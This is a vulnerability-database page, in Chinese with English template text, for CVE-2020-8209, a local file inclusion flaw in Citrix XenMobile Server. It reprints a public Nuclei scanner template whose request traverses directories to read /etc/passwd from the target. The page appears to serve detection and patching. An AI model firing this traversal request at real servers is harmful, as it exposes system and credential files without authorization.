CVE-2020-8209: Citrix XenMobile Server - Local File Inclusion

日期: 2025-08-01 | 影响软件: Citrix XenMobile Server | POC: 已公开

漏洞描述

Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6, and Citrix XenMobile Server before 10.9 RP5 are susceptible to local file inclusion vulnerabilities. reference: - https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/ - https://support.citrix.com/article/CTX277457 - https://nvd.nist.gov/vuln/detail/CVE-2020-8209

PoC代码[已公开]

id: CVE-2020-8209

info:
  name: Citrix XenMobile Server - Local File Inclusion
  author: dwisiswant0
  severity: high
  description: |
    Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6, and Citrix XenMobile Server before 10.9 RP5 are susceptible to local file inclusion vulnerabilities.
    reference:
    - https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
    - https://support.citrix.com/article/CTX277457
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8209
  impact: |
    An attacker can access sensitive information stored on the server, potentially leading to further compromise or unauthorized access.
  remediation: |
    Apply the latest security patches or updates provided by Citrix to fix the vulnerability.
  reference:
    - https://support.citrix.com/article/CTX277457
    - https://github.com/Miraitowa70/POC-Notes
    - https://github.com/dudek-marcin/Poc-Exp
    - https://github.com/hectorgie/PoC-in-GitHub
    - https://github.com/pen4uin/vulnerability-research
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-8209
    cwe-id: CWE-22
    epss-score: 0.92198
    epss-percentile: 0.99705
    cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: citrix
    product: xenmobile_server
  tags: cve2020,cve,citrix,lfi,xenmobile

http:
  - method: GET
    path:
      - "{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "fileDownload=true"
          - "application/octet-stream"
          - "attachment;"
        condition: and

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 490a0046304402207afaf9bcca0ac9a1b7b2bf6a59c06c5424a06e15956014b45535d6528c4e711d022047285992dd8e772543c077545e0889c467534fe4a5efdb307e52962d1caee592:922c64590222798bb761d5b6d8e72950

相关漏洞推荐